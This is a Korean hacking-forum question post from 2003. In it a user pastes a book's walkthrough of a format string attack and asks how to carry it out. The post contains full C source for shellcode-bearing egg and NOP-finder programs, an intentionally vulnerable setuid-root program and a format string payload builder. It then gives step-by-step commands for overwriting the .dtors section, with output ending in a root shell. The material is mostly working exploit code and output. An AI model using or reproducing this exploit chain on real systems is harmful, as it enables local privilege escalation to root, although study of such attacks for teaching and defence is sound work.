시스템 해킹

1574,

5/79

rlackddn2002

fsb도스코드 만들기에 대한질문

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_system&no=99 [복사]

제가 산 책에있던 설명입니다..

1. Eggshell
이 코드는 쉘코드를 메모리안으로 복사하기 위해서 사용된다.

"Format String Attack on alpha system" 에서 코드의 일부를 참고 하였다.

-----------------egg.c--------------------------

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define DEF_EGGSIZE 4096
#define DEF_ALIGN 5

char nop[] = { 0x90 };

static char shellcode[] =
"\x6a\x17\x58\x31\xdb\xcd\x80\x31"
"\xd2\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x8d\x42\x0b\xcd\x80";

int
main( int argc, char *argv[] )
{

char *eggbuf, *buf_ptr;
int align, i, eggsize ;

align = DEF_ALIGN;
eggsize = DEF_EGGSIZE ;

if ( argc < 2 ) {
printf ("%s <align> <size>\n", argv[0] );
exit(0);
}

if ( argc > 1 )
align = DEF_ALIGN + atoi(argv[1]);

if ( argc > 2 )
eggsize = atoi(argv[2]) + DEF_ALIGN ;

if ( (eggbuf = malloc( eggsize )) == NULL ) {
printf ("error : malloc \n");
exit (-1);
}

/* set egg buf */
memset( eggbuf, (int)NULL , eggsize );

for ( i = 0; i < 250 ; i++ )
strcat ( eggbuf, nop );

strcat ( eggbuf, shellcode );

for ( i =0 ; i < align ; i++ )
strcat ( eggbuf, "A");

memcpy ( eggbuf, "S=", 2 );
putenv ( eggbuf );

system("/bin/sh");

}

--------------------------end here----------------------------------------

2. "find.c" 을 이용하여 여러분은 스택에서의 쉘코드의 위치를 알 수 있다(GOOBLES
screen-exploit 로 부터).

또한 아래와 같은 방법으로도 주소를 알아낼 수 있다.

a) gdb ./vuln
b) set args %s%s%s%s%s%s%s%s%s%s
c) run
d) gdb say vuln exit with an error
e) x/2000 $ebp
f) serch the memory location with the nops(0x90).

-------------------------find.c-----------------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*Thanks to GOBBLES for the code*/

unsigned long get_sp(void)
{ __asm__ ("movl %esp, %eax");
}

int i=0;
char *pointer;
char *nops = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
main(){
fprintf(stderr, ". SUCHE!\n");
pointer = (char *)get_sp();
while((i = strncmp(pointer, nops, strlen(nops))) != 0)
pointer++;

if(i == 0) {
fprintf(stderr, "Shellcode ist bei ----> : 0x%lx\n", pointer+1);
return;
}
else {
fprintf(stderr, "Sorry nimm GDB\n");
return;
}
}

--------------------------end here------------------------------------------

3. 이것은 버그를 집어넣은 프로그램이다.
필자는 이것을 Christophe BLAESS Christophe GRENIERFredereric RAYNAL의 "What are format bugs ?" 부터 참조했다.

아마도 최고의 지침서로 평가된다.

--------------------------vuln.c------------------------------------------

/* vuln.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int helloWorld();
int accessForbidden();

int vuln(const char *format)
{
char buffer[128];
int (*ptrf)();

memset(buffer, 0, sizeof(buffer));

printf("helloWorld() = %p\n", helloWorld);
printf("accessForbidden() = %p\n\n", accessForbidden);

ptrf = helloWorld;
printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

snprintf(buffer, sizeof buffer, format);
printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));

printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);

return ptrf();
}

int main(int argc, char **argv) {
int i;
if (argc <= 1) {
fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
exit(-1);
}
for(i=0;i<argc;i++)
printf("%d %p\n",i,argv[i]);

exit(vuln(argv[1]));
}

int helloWorld()
{
printf("Welcome in \"helloWorld\"\n");
fflush(stdout);
return 0;
}

int accessForbidden()
{
printf("You shouldn't be here \"accesForbidden\"\n");
fflush(stdout);
return 0;
}

------------------------------end here-------------------------------

4. 이것 역시 "What are format bugs ?" 로 부터 가져왔으며 마지막 관문인 Formatstringbuilder "builder.c" 이다.

프로그래밍이 되시는 분들은 수작업으로 코딩해서 써도 무방하다.

-----------------------------builder.c------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/**
The 4 bytes where we have to write are placed that way : HH HH LL LL

The variables ending with "*h" refer to the high part of the word (H)
The variables ending with "*l" refer to the low part of the word (L)
*/
char* build(unsigned int addr, unsigned int value, unsigned int where) {

unsigned int length = 128; //too lazy to evaluate the true length ...
unsigned int valh;
unsigned int vall;
unsigned char b0 = (addr >> 24) & 0xff;
unsigned char b1 = (addr >> 16) & 0xff;
unsigned char b2 = (addr >> 8) & 0xff;
unsigned char b3 = (addr ) & 0xff;

char *buf;

/* detailing the value */
valh = (value >> 16) & 0xffff; //top
vall = value & 0xffff; //bottom

fprintf(stderr, "adr : %d (%x)\n", addr, addr);
fprintf(stderr, "val : %d (%x)\n", value, value);
fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);

/* buffer allocation */
if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
fprintf(stderr, "Can't allocate buffer (%d)\n", length);
exit(EXIT_FAILURE);
}
memset(buf, 0, length);

/* let's build */
if (valh < vall) {

snprintf(buf,
length,
"%c%c%c%c" /* high address */
"%c%c%c%c" /* low address */

"%%.%hdx" /* set the value for the first %hn */
"%%%d$hn" /* the %hn for the high part */

"%%.%hdx" /* set the value for the second %hn */
"%%%d$hn" /* the %hn for the low part */
,
b3+2, b2, b1, b0, /* high address */
b3, b2, b1, b0, /* low address */

valh-8, /* set the value for the first %hn */
where, /* the %hn for the high part */

vall-valh, /* set the value for the second %hn */
where+1 /* the %hn for the low part */
);

} else {

snprintf(buf,
length,
"%c%c%c%c" /* high address */
"%c%c%c%c" /* low address */

"%%.%hdx" /* set the value for the first %hn */
"%%%d$hn" /* the %hn for the high part */

"%%.%hdx" /* set the value for the second %hn */
"%%%d$hn" /* the %hn for the low part */
,
b3+2, b2, b1, b0, /* high address */
b3, b2, b1, b0, /* low address */

vall-8, /* set the value for the first %hn */
where+1, /* the %hn for the high part */

valh-vall, /* set the value for the second %hn */
where /* the %hn for the low part */
);
}
return buf;
}

int
main(int argc, char **argv) {

char *buf;

if (argc < 3)
return EXIT_FAILURE;
buf = build(strtoul(argv[1], NULL, 16), /* adresse */
strtoul(argv[2], NULL, 16), /* valeur */
atoi(argv[3])); /* offset */

fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
printf("%s", buf);
return EXIT_SUCCESS;
}

------------------------------------end here------------------------------------

자..이제부터 슬슬 시작해보자.

우선 다음과 같은 명령어로 컴파일 해보자.

gcc -o vuln vuln.c

그리고 setuid 루트의 권한을 준다.

chown root.root vuln
chmod 4775 vuln

hn> ls -la
insgesamt 91
drwxr-xr-x 2 exp users 253 Apr 27 16:16 .
drwx------ 21 exp users 2240 Apr 27 16:32 ..
-rwxr-xr-x 1 exp users 15204 Apr 27 15:53 build
-rw-r--r-- 1 exp users 3804 Apr 26 19:25 build.c
-rw-r--r-- 1 exp users 36 Apr 26 19:26 chmod.txt
-rw-r--r-- 1 exp users 34 Apr 26 19:27 dtors.tct
-rwxr-xr-x 1 exp users 14756 Apr 27 15:42 egg
-rw-r--r-- 1 exp users 1377 Apr 26 19:25 egg.c
-rwxr-xr-x 1 exp users 14121 Apr 27 16:04 find
-rw-r--r-- 1 exp users 748 Apr 27
-rwsrwxr-x 1 root root 15028 Apr 27 15:54 vuln
-rw-r--r-- 1 exp users 1009 Apr 26 19:55 vuln.c

vuln 이 setuid root 로 설정이 되어 있음을 볼 수 있다.

2. eggshell 을 시작한다(현재 스택안에 있음).

hn> ./egg 5 6000
sh-2.05$

다른 취약점을 사용할 수도 있으니 각자 해보도록...

3. vuln 으로 부터 .dtors 섹션을 찾는다(이것이 오버라이트를 할 메모리의 주소이다).

sh-2.05$ objdump -s -j .dtors vuln

vuln: file format elf32-i386

Contents of section .dtors:
8049a64 ffffffff 00000000 ........
sh-2.05$

여기서 위치는 0x8049a64+4=0x8049a68 이다(매번 4을 더해야 한다 "Overwriting the .dtors section."를 참조하기 바란다).

4.3번과 마지막 인자는 오프셋이다.
각 박스에 따라 이 오프셋을 달라진다.

필자는 아래와 같이 수동으로 찾는법을 택했다.

sh-2.05$ ./vuln AAAA%6\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA4000b07e] (12)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

sh-2.05$ ./vuln AAAA%7\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA8048780] (11)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

sh-2.05$ ./vuln AAAA%8\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA41414141] (12) <--------- 발견 !!! A는16진수로 41 이기 때문에
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

여러분은 여기서 오프셋이 8이라는 것을 알수가 있다.

참고 : 여러분은 필자가 6에서 시작한것을 따라하지 말고 1부터 해 보시기 바란다.

5. 자 이제 여기서 우리는 0x8049a68 에 써넣을 쉘코드의 위치를 알아내야 한다.

sh-2.05$ ./find
. SUCHE!
Shellcode ist bei ----> : 0xbffffbae

6. 드디어 준비는 끝났다.
지금까지 우리는 다음과 같은 3개의 인자들을 얻어냈다.

- where(0x8049a68)

- what(0xbffffbae)

- Offset(8)

여기서 제일 나중의 사용자를 다음과 같이 체크한다.

sh-2.05$ whoami
exp

그리고 공격을 시작한다.

sh-2.05$ ./vuln `./build 0x8049a68 0xbffffbae 8`

adr : 134519400 (8049a68)
val : -1073742930 (bffffbae)
valh: 49151 (bfff)
vall: 64430 (fbae)
[jh%.49143x%8$hn%.15279x%9$hn] (34)
0 0xbffff676
1 0xbffff67d
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3bc)
buffer = [jh00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127)
after : ptrf() = 0x8048780 (0xbffff3bc)
Welcome in "helloWorld"

sh-2.05# whoami
root <--------------- 루트 획득한 것을 볼 수 있다.!!!!!!

참고 : 여기서 소개하는 모든 인자는 상황에 따라 달라질 수 있다.

어떠케 하는지도 잘몰겠어여 제발방법좀

Hit : 3699 Date : 2003/12/30 05:03